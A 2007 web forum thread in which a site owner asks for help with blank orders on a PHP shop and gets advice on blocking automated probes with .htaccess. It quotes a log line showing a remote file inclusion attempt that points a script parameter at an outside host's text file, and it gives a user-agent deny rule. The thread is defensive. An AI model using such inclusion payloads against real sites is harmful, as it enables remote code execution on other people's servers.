Sentinel Type Security For Regular PHP Site?

Posted: Tue Aug 07, 2007 9:35 am

Been running Sentinel for a long time so I have to ask ... Is there some sort of Sentinel type protection application for a regular PHP type site, not Nuke?

I have a customer where we're running a site written in plain old PHP. The site uses Sunshop for ordering and there are several blank orders coming through. Looking at the logs there are several lines using the /checkout.php/ for example:

Code:

"GET /shop/checkout.php?abs_path=http://www.italiandirectory.com/cache/echo.txt? HTTP/1.1" 200 23661 "-" "libwww-perl/5.807"

I can't figure out the attempted exploit as there is nothing intrusive happening that I can see.

Posting this here as you guys have been VERY helpful with previous issues, etc.

Thanks, Jay

Hangin' Around Joined: May 30, 2004 Posts: 46

Do a search on the forums for:

Code:




libwww-perl

There are numerous posts indicating how to stop those type of attacks using your (dot)htaccess file.

As for having Sentinel type program working with other than Nuke sites, there isn't anything published. But I have managed to get Sentinel working with Subdreamer CMS and IPB forums on my local machine.

Posted: Tue Aug 07, 2007 11:10 am

They are probably just wildy throwing things at your scripts, not knowing what type of software you have. That attack may be meant for another CMS for example.

Their user agent means they are using a Perl script to access your site, not a browser. The user agent can easily be spoofed however. You can use .htaccess to block those user agents, as discussed in other threads.

As far as using Sentinel on a non-Nuke PHP site, you could probably get it to work, but I would just ensure you are propertly sanitizing all inputs. And turn register_globals off.

Posted: Tue Aug 07, 2007 11:26 am

Didn't think about the .htaccess but that makes sense, thanks for jogging the memory. The script seems to be innocuous but it's rather annoying to the customer because every time they try, it causes a blank order to be generated.

register_globals has to be ON for the time being, other sites need it on.

Will report back with success .. thanks all.

Posted: Tue Aug 07, 2007 12:03 pm

This one in the .htaccess file did the trick. Error_log loaded with "Denied by server configuration" in the last 1/2 hr.

SetEnvIfNoCase User-Agent "^libwww-perl*" block_bad_bots
Deny from env=block_bad_bots

Thanks to all ..... Jay

Posted: Tue Aug 07, 2007 6:12 pm

Rockin'!

Posted: Tue Aug 07, 2007 8:47 pm

Your welcome. It is really refreshing that after a problem is solved that the person comes back and thanks the community.